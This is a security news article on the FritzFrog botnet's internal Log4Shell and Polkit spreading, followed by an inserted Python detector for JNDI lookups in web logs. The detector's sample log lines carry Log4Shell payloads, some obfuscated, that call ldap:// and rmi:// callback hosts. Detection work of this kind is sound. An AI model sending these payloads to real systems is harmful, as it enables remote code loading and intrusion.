It's been more than two years since the critical vulnerability in Log4j first came to light, yet attackers are still making good use of it, as many organizations remain unpatched.
Those unpatched hosts are concentrated, it seems, in parts of the network that look deceptively secure because they are not exposed to the Internet.
Unlike most Log4Shell attacks, FritzFrog - a peer-to-peer, Golang-based botnet - doesn't aim its Log4Shell exploitation at Internet-facing systems and services.
Its trick, rather, is to use hosts it has already compromised to search for and spread through the same vulnerability in internal network assets, which organizations are less likely to have patched.
Log4Shell is just one of FritzFrog's new tricks.
How FritzFrog Spreads
Historically, FritzFrog has infected networks by brute-forcing Internet-facing servers with weak SSH passwords.
The new variant builds on this tactic: on each compromised host it reads several system logs to identify additional, potentially weak targets to spread to within the network.
In addition to weak SSH passwords, it now also scans those targets for Log4Shell openings.
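The spreading technique described above relies on the same Log4Shell lookup string that Internet-facing scanners hunt for, only issued from an already-compromised host inside the network. As an added example (not FritzFrog's code and not from the original article), the following Python scans web-server log lines for JNDI lookups, undoing the nested-lookup obfuscation (${lower:}, ${upper:}, ${x:-default}) and URL encoding commonly used to evade plain string matching, and flags whether the lookup's callback target is an RFC 1918 address. The log lines and IP addresses are constructed for this example, and treating an internal callback target as a sign that the attacker is already inside is this example's own heuristic, not something the article states.

```python
"""Detect Log4Shell (JNDI lookup) payloads in web-server log lines.

Illustrative example only; not FritzFrog's code or a vendor signature.
The sample log lines at the bottom are constructed for this example.
"""
import ipaddress
import re
from typing import Dict, List
from urllib.parse import unquote

# Innermost Log4j lookup: ${...} whose body contains no nested "${" or "}".
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# After normalisation, a JNDI lookup: ${jndi:<scheme>://<host[:port]>...
_JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^/\s}]+)", re.IGNORECASE)

# RFC 1918 ranges, checked explicitly (ipaddress.is_private also counts
# documentation and other special-purpose blocks, which is not wanted here).
_RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def _resolve(body: str) -> str:
    """Evaluate one innermost lookup the way Log4j 2.x's string substitution
    would, for the handful of lookups attackers use to hide the word 'jndi'."""
    low = body.lower()
    if low.startswith("jndi:"):
        return "${" + body + "}"            # keep: this is what we are hunting for
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # Default-value syntax ${key:-default}: ${::-j} and ${env:NOPE:-j} both yield "j"
        return body.split(":-", 1)[1]
    return "${" + body + "}"                # unknown lookup: leave as-is


def normalize_lookups(text: str, max_rounds: int = 32) -> str:
    """URL-decode once, then collapse nested lookups from the inside out
    until nothing changes (bounded so pathological input cannot spin)."""
    text = unquote(text)
    for _ in range(max_rounds):
        new = _INNER_LOOKUP.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def _is_rfc1918(host: str) -> bool:
    """True if host (optionally host:port) is an RFC 1918 IPv4 address."""
    addr = host.rsplit(":", 1)[0] if host.count(":") == 1 else host
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False                        # hostname, not an IP literal
    return any(ip in net for net in _RFC1918)


def scan_logs(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per log line that carries a JNDI lookup after normalisation."""
    findings = []
    for i, raw in enumerate(lines, start=1):
        norm = normalize_lookups(raw)
        m = _JNDI.search(norm)
        if not m:
            continue
        target = m.group(2)
        findings.append({
            "line_no": i,
            "scheme": m.group(1).lower(),
            "target": target,
            # Heuristic: an attacker already inside the network will usually
            # point the victim at an internal listener; flag that separately.
            "internal_target": _is_rfc1918(target),
            "decoded": norm[m.start():m.end()],
        })
    return findings


# Constructed Apache-style access-log lines; addresses are illustrative.
SAMPLE_LOGS = [
    '10.0.4.21 - - [01/Feb/2024:10:15:02 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://10.0.4.77:1389/a}"',
    '10.0.4.21 - - [01/Feb/2024:10:15:03 +0000] "GET /api/v1/users HTTP/1.1" 200 88 "-" "${${lower:j}${upper:n}di:${::-l}dap://10.0.4.77:1389/b}"',
    '10.0.4.21 - - [01/Feb/2024:10:15:04 +0000] "GET /health HTTP/1.1" 200 2 "-" "${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap://10.0.4.77:1389/c}"',
    '203.0.113.8 - - [01/Feb/2024:10:16:00 +0000] "GET / HTTP/1.1" 200 1024 "-" "${jndi:rmi://203.0.113.99/x}"',
    '10.0.4.21 - - [01/Feb/2024:10:16:30 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F172.16.9.9%3A1389%2Fz%7D HTTP/1.1" 200 10 "-" "curl/8.0"',
    '192.168.1.10 - - [01/Feb/2024:10:17:00 +0000] "GET /index.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan_logs(SAMPLE_LOGS):
        print(finding)
```

Run against the constructed lines, the scanner reports five findings and ignores the benign sixth line; the four with 10.x or 172.16.x callback targets are the pattern an internal-spreading worm would produce. Normalising lookups before matching is the important part: matching the literal string "${jndi:" alone misses the second and third lines entirely.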
FritzFrog's Other New Tricks
Improved network scanning and Log4Shell exploitation are just two of FritzFrog's latest upgrades.
Another is exploitation of a trivial-to-exploit flaw in Polkit: though two years have passed since its disclosure, the flaw is likely still widespread, as Polkit is installed by default in most Linux distributions.
The FritzFrog developers have also given a good deal of thought to stealth.
These tricks, among others, have contributed to the botnet's more than 20,000 attacks against more than 1,500 victims since it was first spotted in 2020.
This Cyber News was published on www.darkreading.com. Publication date: Thu, 01 Feb 2024 19:45:19 +0000